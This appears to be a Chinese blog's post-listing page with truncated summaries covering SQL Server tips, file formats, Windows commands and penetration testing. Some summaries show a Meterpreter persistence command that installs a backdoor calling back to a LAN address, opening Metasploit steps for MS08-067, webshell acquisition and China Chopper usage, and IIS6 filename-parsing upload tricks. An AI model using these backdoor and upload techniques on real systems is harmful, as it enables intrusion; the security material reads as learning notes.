摘要:安装后门方法一:meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is 609628 bytes longRunningPersistance ScriptResource fil 阅读全文
posted @ 2018-07-31 09:01 桃花雪 阅读 (915) 评论 (0) 编辑
摘要:现在PC平台流行的可执行文件格式(Executable)主要是Windows下的PE(Portable Executable)和Linux的ELF(Executable Linkable Format),它们都是COFF(Common file format)格式的变种。不光是可执行文件(Windo 阅读全文
posted @ 2018-07-23 14:40 桃花雪 阅读 (1689) 评论 (0) 编辑
摘要:一、 概述 本文介绍了android中获取root权限的方法以及原理,让大家对android玩家中常说的“越狱”有一个更深层次的认识。 二、 Root的介绍 1. Root 的目的 可以让我们拥有掌控手机系统的权限,比如删除一些system/app下面的无用软件,更换开关机铃声和动画,拦截状态栏弹出 阅读全文
posted @ 2018-07-20 15:56 桃花雪 阅读 (2261) 评论 (1) 编辑
摘要:一、ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确 阅读全文
posted @ 2018-07-11 15:24 桃花雪 阅读 (438) 评论 (0) 编辑
摘要:开始→运行→命令集锦 winver 检查Windows版本 wmimgmt.msc 打开windows管理体系结构(WMI) wupdmgr windows更新程序 wscript windows脚本宿主设置 write 写字板 winmsd 系统信息 wiaacmgr 扫描仪和照相机向导 winc 阅读全文
posted @ 2018-07-11 15:15 桃花雪 阅读 (193) 评论 (0) 编辑
摘要:一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind sh 阅读全文
posted @ 2018-07-05 15:02 桃花雪 阅读 (699) 评论 (0) 编辑
摘要:工具:metasploit,目标系统 windows xp sp3 English 渗透攻击过程 1.search MS08-067 2. use exploit/windows/smb/ms08_067_netapi 3. show payloads 4. set payload generic/ 阅读全文
posted @ 2018-07-03 10:54 桃花雪 阅读 (1177) 评论 (0) 编辑
摘要:Nmap(Network Mapper)是一款开放源代码的网络探测和安全审核工具。它的设计目标是快速地扫描大型网络,不适应于单一主机。Nmap使用检测IP数据包来确定访问的主机、提供的服务、数据包的类型等其他信息;Nmap通常被用来做安全审查,比如日常的网络日常检查、管理service升级计划以及检 阅读全文
posted @ 2018-06-28 09:40 桃花雪 阅读 (350) 评论 (0) 编辑
摘要:web服务器 1.web服务器关闭不需要的IIS组件,比如禁用wev,禁用cgi和asp功能2.隐藏网站物理路径,删除默认网站,更改网站的物理路径3.删除无用的虚拟目录以及iis映射,只保留需要后缀文件的映射, 4.启用IIS日志记录,每天审查日志5.设置web站点目录访问权限为读取权限,去除写入, 阅读全文
posted @ 2018-06-27 09:40 桃花雪 阅读 (383) 评论 (0) 编辑
摘要:黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。本篇文章将如何获取webshell总结成为了十种方法,希望广大的企业网络管理员能够通过了解获取webshell的途径,对企业自身进行防范。 一、通过上传文件类型过滤漏洞获取webshel 阅读全文
posted @ 2018-06-22 13:51 桃花雪 阅读 (5790) 评论 (0) 编辑
摘要:中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。 1. 阅读全文
posted @ 2018-06-22 11:41 桃花雪 阅读 (7080) 评论 (0) 编辑
摘要:概括: 从技术角度分析IIS6文件名解析漏洞的原理与IIS7的相关情况。a.IIS6错误解析文件类型现象1、当WEB目录下,文件名以 xxx.asp;xxx.xxx 来进行命名的时候,此文件将送交asp.dll解析(也就是执行脚本)2、当WEB目录下,在访问以 xxx.asp 命名的目录下的任意文件 阅读全文
posted @ 2018-06-21 17:22 桃花雪 阅读 (963) 评论 (0) 编辑
摘要:IIS 6.0 1.目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码 IIS6.0 会将 xx.jpg 解析为 asp 文件。 2.后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名) IIS6.0 阅读全文
posted @ 2018-06-21 17:08 桃花雪 阅读 (790) 评论 (0) 编辑
摘要:现在我有两张表分别是S_PERSON,S_USER S_PERSON S_USER 我现在想把S_USER表中的ACCOUNT批量修改成S_PERSON的ACCOUNT 我们可以发现S_USER表中有个跟S_PERSON表关联的字段 那就是PERSON_ID 这也是我们要update的条件 找到这个 阅读全文
posted @ 2018-05-18 19:50 桃花雪 阅读 (77) 评论 (0) 编辑
摘要:x在传统关系型数据库中,group by与count(distinct)都是很常见的操作。count(distinct colA)就是将colA中所有出现过的不同值取出来,相信只要接触过数据库的同学都能明白什么意思。 count(distinct colA)的操作也可以用group by的方式完成, 阅读全文
posted @ 2018-05-08 16:20 桃花雪 阅读 (70) 评论 (0) 编辑
摘要:1.显示执行计划的详细步骤 SET SHOWPLAN_ALL ON; SET SHOWPLAN_ALL OFF; 2. 显示执行语句的IO成本,时间成本 SET STATISTICS IO ON SET STATISTICS IO OFF SET STATISTICS TIME ON SET STA 阅读全文
posted @ 2018-04-25 15:17 桃花雪 阅读 (123) 评论 (0) 编辑
摘要:1、说明:创建数据库 CREATE DATABASE database-name 2、说明:删除数据库 drop database dbname 3、说明:备份sql server 创建 备份数据的 device USE master EXEC sp_addumpdevice 'disk', 'te 阅读全文
posted @ 2018-04-24 17:09 桃花雪 阅读 (78) 评论 (0) 编辑
摘要:1、说明:显示文章、提交人和最后回复时间 select a.title,a.username,b.adddate ,(select max(adddate) from table where table.title=a.title) adddate from table a 2、说明:两张关联表,删 阅读全文
posted @ 2018-04-24 16:56 桃花雪 阅读 (84) 评论 (0) 编辑
摘要:表:id,title,postuser,postdate,parentid 准备sql语句: drop table if exists articles; create table articles(id int auto_increment primary key,title varchar(50 阅读全文
posted @ 2018-04-24 16:42 桃花雪 阅读 (35) 评论 (0) 编辑
摘要:Sql Server 中一个非常强大的日期格式化函数Select CONVERT(varchar(100), GETDATE(), 0): 05 16 2006 10:57AMSelect CONVERT(varchar(100), GETDATE(), 1): 05/16/06Select CON 阅读全文
posted @ 2018-04-24 16:07 桃花雪 阅读 (370) 评论 (0) 编辑